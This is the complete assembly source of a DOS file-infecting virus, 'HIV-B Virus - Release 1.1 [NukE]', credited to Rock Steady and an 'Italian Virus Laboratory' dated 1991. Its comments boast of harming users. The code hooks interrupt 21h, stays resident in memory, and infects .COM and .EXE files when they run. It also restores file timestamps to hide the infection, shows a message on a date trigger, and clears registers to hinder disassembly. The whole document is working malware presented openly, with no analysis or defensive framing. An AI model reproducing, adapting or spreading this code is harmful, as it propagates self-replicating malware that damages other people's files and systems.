DATA_1E          EQU     4CH           ; Just a Few Data Segments that are
DATA_3E          EQU     84H           ; Needed for the virus to find some
DATA_5E          EQU     90H           ; hard core info...
DATA_7E          EQU     102H
DATA_8E          EQU     106H
DATA_9E          EQU     122H
DATA_10E         EQU     124H
DATA_11E         EQU     15AH
DATA_12E         EQU     450H
DATA_13E         EQU     462H
DATA_14E         EQU     47BH
DATA_15E         EQU     0
DATA_16E         EQU     1
DATA_17E         EQU     2
DATA_18E         EQU     6
DATA_42E         EQU     0FB2CH
DATA_43E         EQU     0FB2EH
DATA_44E         EQU     0FB4BH
DATA_45E         EQU     0FB4DH
DATA_46E         EQU     0FB83H
DATA_47E         EQU     0FB8DH
DATA_48E         EQU     0FB8FH
DATA_49E         EQU     0FB95H
DATA_50E         EQU     0FB97H
DATA_51E         EQU     0
DATA_52E         EQU     2

SEG_A            SEGMENT BYTE PUBLIC
                 ASSUME  CS:SEG_A, DS:SEG_A


                 ORG     100h                  ; Compile this to a .COM file!
                                              ; So the Virus starts at 0100h
HIV              PROC    FAR

START:
                 JMP     LOC_35
                 DB      0C3H
                 DB      23 DUP (0C3H)
                 DB      61H, 6EH, 74H, 69H, 64H, 65H
                 DB      62H, 0C3H, 0C3H, 0C3H, 0C3H
                 DB      'HIV-B Virus - Release 1.1 [NukE]'
                 DB      ' '
copyright        DB      '(C) Edited by Rock Steady [NukE]'
                 DB      0, 0
DATA_24          DW      0
DATA_25          DW      0
DATA_26          DW      0
DATA_27          DW      706AH
DATA_28          DD      00000H
DATA_29          DW      0
DATA_30          DW      706AH
DATA_31          DD      00000H
DATA_32          DW      0
DATA_33          DW      706AH
DATA_34          DB      'HIV-B VIRUS - Release 1.1 [NukE]', 0AH, 0DH
                 DB      'Edited by Rock Steady [NukE]', 0AH, 0DH
                 DB      '(C) 1991 Italian Virus Laboratory', 0AH, 0DH
                 DB      '$'
                 DB      0E8H, 83H, 3, 3DH, 4DH, 4BH
                 DB      75H, 9, 55H, 8BH, 0ECH, 83H
                 DB      66H, 6, 0FEH, 5DH, 0CFH, 80H
                 DB      0FCH, 4BH, 74H, 12H, 3DH, 0
                 DB      3DH, 74H, 0DH, 3DH, 0, 6CH
                 DB      75H, 5, 80H, 0FBH, 0, 74H
                 DB      3
LOC_1:
                 JMP     LOC_13
LOC_2:
                 PUSH    ES               ; Save All Regesters so that when
                 PUSH    DS               ; we restore the program it will
                 PUSH    DI               ; RUN correctly and hide the fact
                 PUSH    SI               ; that any Virii is tampering with
                 PUSH    BP               ; the System....
                 PUSH    DX
                 PUSH    CX
                 PUSH    BX
                 PUSH    AX
                 CALL    SUB_6
                 CALL    SUB_7
                 CMP     AX,6C00H
                 JNE     LOC_3                   ; Jump if not equal
                 MOV     DX,SI
LOC_3:
                 MOV     CX,80H
                 MOV     SI,DX

LOCLOOP_4:
                 INC     SI                      ; Slowly down the System a
                 MOV     AL,[SI]                 ; little.
                 OR      AL,AL                   ; Zero ?
                 LOOPNZ  LOCLOOP_4               ; Loop if zf=0, cx>0

                 SUB     SI,2
                 CMP     WORD PTR [SI],4D4FH
                 JE      LOC_7                   ; Jump if equal
                 CMP     WORD PTR [SI],4558H
                 JE      LOC_6                   ; Jump if equal
LOC_5:
                 JMP     SHORT LOC_12            ;
                 DB      90H
LOC_6:
                 CMP     WORD PTR [SI-2],452EH
                 JE      LOC_8                   ; Jump if equal
                 JMP     SHORT LOC_5             ;
LOC_7:
                 NOP
                 CMP     WORD PTR [SI-2],432EH
                 JNE     LOC_5                   ; Jump if not equal
LOC_8:
                 MOV     AX,3D02H
                 CALL    SUB_5
                 JC      LOC_12                  ; Jump if carry Set
                 MOV     BX,AX
                 MOV     AX,5700H
                 CALL    SUB_5                   ; Initsilize the virus...
                 MOV     CS:DATA_24,CX           ; A Basic Start up to check
                 MOV     CS:DATA_25,DX           ; The Interrup 21h
                 MOV     AX,4200H
                 XOR     CX,CX
                 XOR     DX,DX
                 CALL    SUB_5
                 PUSH    CS
                 POP     DS
                 MOV     DX,103H
                 MOV     SI,DX
                 MOV     CX,18H
                 MOV     AH,3FH
                 CALL    SUB_5
                 JC      LOC_10                  ; Jump if carry Set
                 CMP     WORD PTR [SI],5A4DH
                 JNE     LOC_9                   ; Jump if not equal
                 CALL    SUB_1
                 JMP     SHORT LOC_10
LOC_9:
                 CALL    SUB_4
LOC_10:
                 JC      LOC_11                  ; Jump if carry Set
                 MOV     AX,5701H
                 MOV     CX,CS:DATA_24
                 MOV     DX,CS:DATA_25
                CALL     SUB_5
LOC_11:
                 MOV     AH,3EH                  ; '>'
                 CALL    SUB_5
LOC_12:
                 CALL    SUB_7
                 POP     AX                      ; A Stealth Procedure to
                 POP     BX                      ; end the virus and restore
                 POP     CX                      ; the program! Pup back all
                 POP     DX                      ; regesters as we found them!
                 POP     BP                      ; so nothings changed...
                 POP     SI
                 POP     DI
                 POP     DS
                 POP     ES
LOC_13:
                 JMP     CS:DATA_28
                 DB      0B4H, 2AH, 0CDH, 21H, 0C3H

HIV              ENDP

;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*-                             SUBROUTINE                                *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

SUB_1            PROC    NEAR                    ; Start of the Virus!
                 MOV     AH,2AH                  ; Get the Date system Date!
                 INT     21H                     ; If its Friday Display the
                                                 ; message at Data34 and End!
                CMP      AL,6
                 JE      LOC_15                  ; If Friday display message
                 JNZ     LOC_14                  ; If not continue infecting
LOC_14:                                         ; and screwing the system!
                 MOV     CX,[SI+16H]
                 ADD     CX,[SI+8]
                 MOV     AX,10H
                 MUL     CX                      ; dx:ax = reg * ax
                 ADD     AX,[SI+14H]
                 ADC     DX,0
                 PUSH    DX
                 PUSH    AX
                 MOV     AX,4202H
                 XOR     CX,CX                   ; Zero register
                 XOR     DX,DX                   ; Zero register
                 CALL    SUB_5
                 CMP     DX,0
                 JNE     LOC_16                  ; Jump if not equal
                 CMP     AX,64EH
                 JAE     LOC_16                  ; Jump if above or =
                 POP     AX
                 POP     DX
                 STC                             ; Set carry flag
                 RETN
LOC_15:
                 MOV     DX,OFFSET DATA_34+18H   ; Display Message at Data34!
                 MOV     AH,9                    ; With New Offset Address in
                 INT     21H                     ; memory!
                                                 ;
                 POP     AX                      ; Restore all Regesters as if
                 POP     BX                      ; nothing was changed and exit
                 POP     CX                      ; virus and run File...
                 POP     DX
                 POP     SI
                 POP     DI
                 POP     BP
                 POP     DS
                 POP     ES
                 MOV     AH,0                    ; Exit Virus if your in a .EXE
                 INT     21H                     ; File!!!
                                                 ; Exit virus if your in a .COM
                 INT     20H                     ; File!!!
LOC_16:
                 MOV     DI,AX
                 MOV     BP,DX
                 POP     CX
                 SUB     AX,CX
                 POP     CX
                 SBB     DX,CX
                 CMP     WORD PTR [SI+0CH],0
                 JE      LOC_RET_19              ; Jump if equal
                 CMP     DX,0
                 JNE     LOC_17                  ; Jump if not equal
                 CMP     AX,64EH
                 JNE     LOC_17                  ; Jump if not equal
                 STC                             ; Set carry flag
                 RETN
LOC_17:
                 MOV     DX,BP
                 MOV     AX,DI
                 PUSH    DX
                 PUSH    AX
                 ADD     AX,64EH
                 ADC     DX,0
                 MOV     CX,200H
                 DIV     CX                      ; Find out How much System
                 LES     DI,DWORD PTR [SI+2]     ; memory is available...
                 MOV     CS:DATA_26,DI           ;
                 MOV     CS:DATA_27,ES           ; Every so often make the
                 MOV     [SI+2],DX               ; system memory small than
                 CMP     DX,0                    ; what it already is...
                 JE      LOC_18                  ; Screws up the users hehe
                 INC     AX
LOC_18:
                 MOV     [SI+4],AX
                 POP     AX
                 POP     DX
                 CALL    SUB_2
                 SUB     AX,[SI+8]
                 LES     DI,DWORD PTR [SI+14H]
                 MOV     DS:DATA_9E,DI
                 MOV     DS:DATA_10E,ES
                 MOV     [SI+14H],DX             ; Tie up some memory!
                 MOV     [SI+16H],AX             ; release it on next execution
                 MOV     DS:DATA_11E,AX          ; Jump to su routine to do
                 MOV     AX,4202H                ; this and disable interrups
                 XOR     CX,CX
                 XOR     DX,DX
                 CALL    SUB_5
                 CALL    SUB_3
                 JC      LOC_RET_19
                 MOV     AX,4200H
                 XOR     CX,CX                   ; Zero register
                 XOR     DX,DX                   ; Zero register
                 CALL    SUB_5
                 MOV     AH,40H
                 MOV     DX,SI
                 MOV     CX,18H
                 CALL    SUB_5
LOC_RET_19:
                 RETN
SUB_1            ENDP


;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*-                            SUBROUTINE                                *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

SUB_2            PROC    NEAR
                 MOV     CX,4
                 MOV     DI,AX
                 AND     DI,0FH

LOCLOOP_20:
                 SHR     DX,1                    ; Shift w/zeros fill
                 RCR     AX,1                    ; Rotate thru carry
                 LOOP    LOCLOOP_20              ; Loop if cx > 0

                 MOV     DX,DI
                 RETN
SUB_2            ENDP


;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*-                             SUBROUTINE                                *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

SUB_3            PROC    NEAR
                 MOV     AH,40H
                 MOV     CX,64EH
                 MOV     DX,100H
                 CALL    SUB_6
                 JMP     SHORT LOC_24
                 DB      90H

;*-*- External Entry into Subroutine -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

SUB_4:
                 MOV     AX,4202H
                 XOR     CX,CX                   ; Zero register
                 XOR     DX,DX                   ; Zero register
                 CALL    SUB_5
                 CMP     AX,64EH
                 JB      LOC_RET_23              ; Jump if below
                 CMP     AX,0FA00H
                 JAE     LOC_RET_23              ; Jump if above or =
                 PUSH    AX
                 CMP     BYTE PTR [SI],0E9H
                 JNE     LOC_21                  ; Jump if not equal
                 SUB     AX,651H
                 CMP     AX,[SI+1]
                 JNE     LOC_21                  ; Jump if not equal
                 POP     AX
                 STC                             ; Set carry flag
                 RETN
LOC_21:
                 CALL    SUB_3
                 JNC     LOC_22                  ; Jump if carry=0
                 POP     AX
                 RETN
LOC_22:
                 MOV     AX,4200H
                 XOR     CX,CX                   ; Zero register
                 XOR     DX,DX                   ; Zero register
                 CALL    SUB_5
                 POP     AX
                 SUB     AX,3
                 MOV     DX,122H
                 MOV     SI,DX
                 MOV     BYTE PTR CS:[SI],0E9H
                 MOV     CS:[SI+1],AX
                 MOV     AH,40H
                 MOV     CX,3
                 CALL    SUB_5

LOC_RET_23:
                 RETN
SUB_3            ENDP


;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*-                             SUBROUTINE                                *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

SUB_5            PROC    NEAR
LOC_24:
                 PUSHF                           ; Push flags
                 CALL    CS:DATA_28
                 RETN
SUB_5            ENDP


;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*-                             SUBROUTINE                                *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

SUB_6            PROC    NEAR
                 PUSH    AX
                 PUSH    DS
                 PUSH    ES
                 XOR     AX,AX                   ; Zero register
                 PUSH    AX
                 POP     DS
                 CLI                             ; Disable the interrupts
                 LES     AX,DWORD PTR DS:DATA_5E ; This Copies the Virus
                 MOV     CS:DATA_29,AX           ; to the COM File...
                 MOV     CS:DATA_30,ES
                 MOV     AX,46AH
                MOV      DS:DATA_5E,AX
                 MOV     WORD PTR DS:DATA_5E+2,CS
                 LES     AX,DWORD PTR DS:DATA_1E ; Loads 32Bit word..
                 MOV     CS:DATA_32,AX           ; get your info needed on
                MOV      CS:DATA_33,ES           ; System...
                 LES     AX,CS:DATA_31
                 MOV     DS:DATA_1E,AX
                 MOV     WORD PTR DS:DATA_1E+2,ES
                 STI                             ; Enable the interrupts
                 POP     ES                      ; and restore regesters!
                 POP     DS                      ; go back to the file
                 POP     AX                      ; being executed...
                 RETN
SUB_6            ENDP


;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*-                             SUBROUTINE                                *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

SUB_7            PROC    NEAR
                 PUSH    AX
                 PUSH    DS
                 PUSH    ES
                 XOR     AX,AX                   ; Zero register
                 PUSH    AX
                 POP     DS
                 CLI                             ; Disable interrupts
                 LES     AX,DWORD PTR CS:DATA_29 ; same as Sub_6 just copy
                 MOV     DS:DATA_5E,AX           ; yourself to the EXE
                 MOV     WORD PTR DS:DATA_5E+2,ES
                 LES     AX,DWORD PTR CS:DATA_32
                 MOV     DS:DATA_1E,AX
                 MOV     WORD PTR DS:DATA_1E+2,ES
                 STI                             ; Enable interrupts
                 POP     ES
                 POP     DS
                 POP     AX
                 RETN
SUB_7            ENDP

                 DB      0B0H, 3, 0CFH, 50H, 53H, 51H
                 DB      52H, 56H, 57H, 55H, 1EH, 6
                 DB      33H, 0C0H, 50H, 1FH, 8AH, 3EH
                 DB      62H, 4, 0A1H, 50H, 4, 2EH
                 DB      0A3H, 0CEH, 4, 2EH, 0A1H, 0C7H
                 DB      4, 0A3H, 50H, 4, 2EH, 0A1H
                 DB      0C5H, 4, 8AH, 0DCH, 0B4H, 9
                 DB      0B9H, 1, 0, 0CDH, 10H, 0E8H
                 DB      34H, 0, 0E8H, 0B7H, 0, 2EH
                 DB      0A1H, 0C7H, 4, 0A3H, 50H, 4
                 DB      0B3H, 2, 0B8H, 2, 9, 0B9H
                 DB      1, 0, 0CDH, 10H, 2EH, 0A1H
                 DB      0CEH, 4, 0A3H, 50H, 4, 7
                 DB      1FH
                 DB      ']_^ZY[X.'
                 DB      0FFH, 2EH, 0CAH, 4
DATA_36          DW      0
DATA_37          DW      1010H
DATA_39          DB      0
DATA_40          DD      706A0000H
                 DB      0, 0, 2EH, 0A1H, 0C7H, 4
                 DB      8BH, 1EH, 4AH, 4, 4BH, 2EH
                 DB      0F6H, 6, 0C9H, 4, 1, 74H
                 DB      0CH, 3AH, 0C3H, 72H, 12H, 2EH
                 DB      80H, 36H, 0C9H, 4, 1, 0EBH
                 DB      0AH
LOC_25:
                 CMP     AL,0
                 JG      LOC_26                  ; Jump if >
                 XOR     CS:DATA_39,1
LOC_26:
                 TEST    CS:DATA_39,2
                 JZ      LOC_27                  ; Jump if zero
                 CMP     AH,18H
                 JB      LOC_28                  ; Jump if below
                 XOR     CS:DATA_39,2
                 JMP     SHORT LOC_28
LOC_27:
                 CMP     AH,0
                 JG      LOC_28                  ; Jump if >
                 XOR     CS:DATA_39,2
LOC_28:
                 CMP     BYTE PTR CS:DATA_36,20H
                 JE      LOC_29                  ; Jump if equal
                 CMP     BYTE PTR CS:DATA_37+1,0
                 JE      LOC_29                  ; Jump if equal
                 XOR     CS:DATA_39,2
LOC_29:
                 TEST    CS:DATA_39,1
                 JZ      LOC_30                  ; Jump if zero
                 INC     BYTE PTR CS:DATA_37
                 JMP     SHORT LOC_31
LOC_30:
                 DEC     BYTE PTR CS:DATA_37     ; (706A:04C7=10H)
LOC_31:
                 TEST    CS:DATA_39,2            ; (706A:04C9=0)
                 JZ      LOC_32                  ; Jump if zero
                 INC     BYTE PTR CS:DATA_37+1   ; (706A:04C8=10H)
                 JMP     SHORT LOC_RET_33        ; (0555)
LOC_32:
                 DEC     BYTE PTR CS:DATA_37+1   ; (706A:04C8=10H)

LOC_RET_33:
                 RETN

;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*-                             SUBROUTINE                                *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

SUB_8            PROC    NEAR
                 MOV     AX,CS:DATA_37
                 MOV     DS:DATA_12E,AX         ; Get info on type of Video
                 MOV     BH,DS:DATA_13E         ; Display the system has...
                MOV      AH,8
                 INT     10H                    ; with ah=functn 08h
                                               ; basically fuck the cursur..
                 MOV     CS:DATA_36,AX
                 RETN
SUB_8            ENDP

                 DB      50H, 53H, 51H, 52H, 56H, 57H
                 DB      55H, 1EH, 6, 33H, 0C0H, 50H
                 DB      1FH, 81H, 3EH, 70H, 0, 6DH
                 DB      4, 74H, 35H, 0A1H, 6CH, 4
                 DB      8BH, 16H, 6EH, 4, 0B9H, 0FFH
                 DB      0FFH, 0F7H, 0F1H, 3DH, 10H, 0
                 DB      75H, 24H, 0FAH, 8BH, 2EH, 50H
                 DB      4, 0E8H, 0BEH, 0FFH, 89H, 2EH
                 DB      50H, 4, 0C4H, 6, 70H, 0
                 DB      2EH, 0A3H, 0CAH, 4, 2EH, 8CH
                 DB      6, 0CCH, 4, 0C7H, 6, 70H
                 DB      0, 6DH, 4, 8CH, 0EH, 72H
                 DB      0, 0FBH
LOC_34:
                 POP     ES
                 POP     DS                  ; Restore and get lost...
                 POP     BP
                 POP     DI
                 POP     SI
                 POP     DX
                 POP     CX
                 POP     BX
                 POP     AX
                 RETN

;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*-                             SUBROUTINE                                *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_9            PROC    NEAR
                 MOV     DX,10H
                 MUL     DX                      ; dx:ax = reg * ax
                 RETN
SUB_9            ENDP


;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*-                             SUBROUTINE                                *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

SUB_10           PROC    NEAR
                 XOR     AX,AX                   ; If if wants to dissamble
                 XOR     BX,BX                   ; us give him a HARD time...
                 XOR     CX,CX                   ; By making all into 0
                 XOR     DX,DX                   ; Zero register
                XOR      SI,SI                   ; Zero register
                 XOR     DI,DI                   ; Zero register
                 XOR     BP,BP                   ; Zero register
                 RETN
SUB_10           ENDP

LOC_35:
                 PUSH    DS
                 CALL    SUB_11

;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*-                             SUBROUTINE                                *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

SUB_11           PROC    NEAR
                 MOV     AX,4B4DH
                 INT     21H                     ; Load and EXEC file...
                                                 ; be runned...
                 NOP
                 JC      LOC_36                  ; Jump if carry Set
                 JMP     LOC_46
LOC_36:
                 POP     SI
                 PUSH    SI
                 MOV     DI,SI
                 XOR     AX,AX                   ; Zero register
                 PUSH    AX
                 POP     DS
                 LES     AX,DWORD PTR DS:DATA_1E ; Load 32 bit ptr
                 MOV     CS:DATA_49E[SI],AX      ; Move lots of data
                 MOV     CS:DATA_50E[SI],ES      ; into CS to infect the file
                 LES     BX,DWORD PTR DS:DATA_3E ; if not infected and shit..
                 MOV     CS:DATA_47E[DI],BX
                 MOV     CS:DATA_48E[DI],ES
                 MOV     AX,DS:DATA_7E
                 CMP     AX,0F000H
                 JNE     LOC_44                  ; Jump if not equal
                 MOV     DL,80H
                 MOV     AX,DS:DATA_8E
                 CMP     AX,0F000H
                 JE      LOC_37                  ; Jump if equal
                 CMP     AH,0C8H
                 JB      LOC_44                  ; Jump if below
                 CMP     AH,0F4H
                 JAE     LOC_44                  ; Jump if above or =
                 TEST    AL,7FH
                 JNZ     LOC_44                  ; Jump if not zero
                 MOV     DS,AX
                 CMP     WORD PTR DS:DATA_51E,0AA55H
                 JNE     LOC_44                  ; Jump if not equal
                 MOV     DL,DS:DATA_52E
LOC_37:
                 MOV     DS,AX
                 XOR     DH,DH                   ; Zero register
                 MOV     CL,9
                 SHL     DX,CL                   ; Shift w/zeros fill
                 MOV     CX,DX
                 XOR     SI,SI                   ; Zero register

LOCLOOP_38:
                 LODSW                           ; String [si] to ax
                 CMP     AX,0FA80H
                 JNE     LOC_39                  ; Jump if not equal
                 LODSW                           ; String [si] to ax
                 CMP     AX,7380H
                 JE      LOC_40                  ; Jump if equal
                 JNZ     LOC_41                  ; Jump if not zero
LOC_39:
                 CMP     AX,0C2F6H
                 JNE     LOC_42                  ; Jump if not equal
                 LODSW                           ; String [si] to ax
                 CMP     AX,7580H
                 JNE     LOC_41                  ; Jump if not equal
LOC_40:
                 INC     SI
                 LODSW                           ; String [si] to ax
                 CMP     AX,40CDH
                 JE      LOC_43                  ; Jump if equal
                 SUB     SI,3
LOC_41:
                 DEC     SI
                 DEC     SI
LOC_42:
                 DEC     SI
                 LOOP    LOCLOOP_38              ; Loop if cx > 0

                 JMP     SHORT LOC_44
LOC_43:
                 SUB     SI,7
                 MOV     CS:DATA_49E[DI],SI
                 MOV     CS:DATA_50E[DI],DS
LOC_44:
                 MOV     AH,62H
                 INT     21H                     ; Simple...Get the PSP
                                                 ; Address (Program segment
                MOV      ES,BX                   ; address and but in BX)
                 MOV     AH,49H
                 INT     21H                     ; Get the Free memory from
                                                 ; the system
                 MOV     BX,0FFFFH               ; release extra memory blocks
                 MOV     AH,48H
                 INT     21H                     ; Allocate the memory
                                                 ; At BX (# bytes)
                 SUB     BX,66H                  ; it attaches virus right
                 NOP                             ; under the 640k
                 JC      LOC_46
                 MOV     CX,ES                   ; did it work? If not just
                 STC                             ; end the virus...
                 ADC     CX,BX
                 MOV     AH,4AH
                 INT     21H                     ; Adjust teh memory block
                                                 ; size! BX has the # of bytes
                 MOV     BX,65H
                 STC                             ; Set carry flag
                 SBB     ES:DATA_17E,BX          ; Where to attach itself!
                 PUSH    ES                      ; under 640K
                 MOV     ES,CX
                 MOV     AH,4AH
                 INT     21H                     ; Just change the memory
                                                 ; allocations! (BX=Btyes Size)
                 MOV     AX,ES
                 DEC     AX
                 MOV     DS,AX
                 MOV     WORD PTR DS:DATA_16E,8  ;Same place under 640k
                 CALL    SUB_9
                MOV      BX,AX
                 MOV     CX,DX
                 POP     DS
                 MOV     AX,DS
                 CALL    SUB_9
                 ADD     AX,DS:DATA_18E
                 ADC     DX,0
                 SUB     AX,BX
                 SBB     DX,CX
                 JC      LOC_45                  ; Jump if carry Set
                 SUB     DS:DATA_18E,AX
LOC_45:
                 MOV     SI,DI
                 XOR     DI,DI                   ; Zero register
                 PUSH    CS
                 POP     DS
                 SUB     SI,4D7H
                 MOV     CX,64EH
                 INC     CX
                REP     MOVSB                   ; Rep when cx >0 Mov [si] to
                MOV     AH,62H                  ; es:[di]
                 INT     21H                     ; Get the Program segment
                                                 ; prefix...so we can infect it
                DEC      BX
                 MOV     DS,BX
                 MOV     BYTE PTR DS:DATA_15E,5AH
                 MOV     DX,1E4H
                 XOR     AX,AX                   ; Zero register
                 PUSH    AX
                 POP     DS
                 MOV     AX,ES
                 SUB     AX,10H
                 MOV     ES,AX
                 CLI                             ; Disable interrupts
                 MOV     DS:DATA_3E,DX           ;
                 MOV     WORD PTR DS:DATA_3E+2,ES
                 STI                             ; Enable interrupts
                 DEC     BYTE PTR DS:DATA_14E    ;
LOC_46:
                 POP     SI
                 CMP     WORD PTR CS:DATA_42E[SI],5A4DH
                 JNE     LOC_47                  ; Jump if not equal
                 POP     DS
                 MOV     AX,CS:DATA_46E[SI]
                 MOV     BX,CS:DATA_45E[SI]      ; all this shit is to restore
                 PUSH    CS                      ; the program and continue
                 POP     CX                      ; running the original
                 SUB     CX,AX                   ; program...
                 ADD     CX,BX
                 PUSH    CX
                 PUSH    WORD PTR CS:DATA_44E[SI]
                 PUSH    DS
                 POP     ES
                 CALL    SUB_10
                 RETF
LOC_47:
                 POP     AX
                 MOV     AX,CS:DATA_42E[SI]
                 MOV     WORD PTR CS:[100H],AX
                 MOV     AX,CS:DATA_43E[SI]
                 MOV     WORD PTR CS:[102H],AX
                 MOV     AX,100H
                 PUSH    AX
                 PUSH    CS
                 POP     DS
                 PUSH    DS
                 POP     ES
                 CALL    SUB_10
                RETN
SUB_11           ENDP


SEG_A            ENDS



                 END     START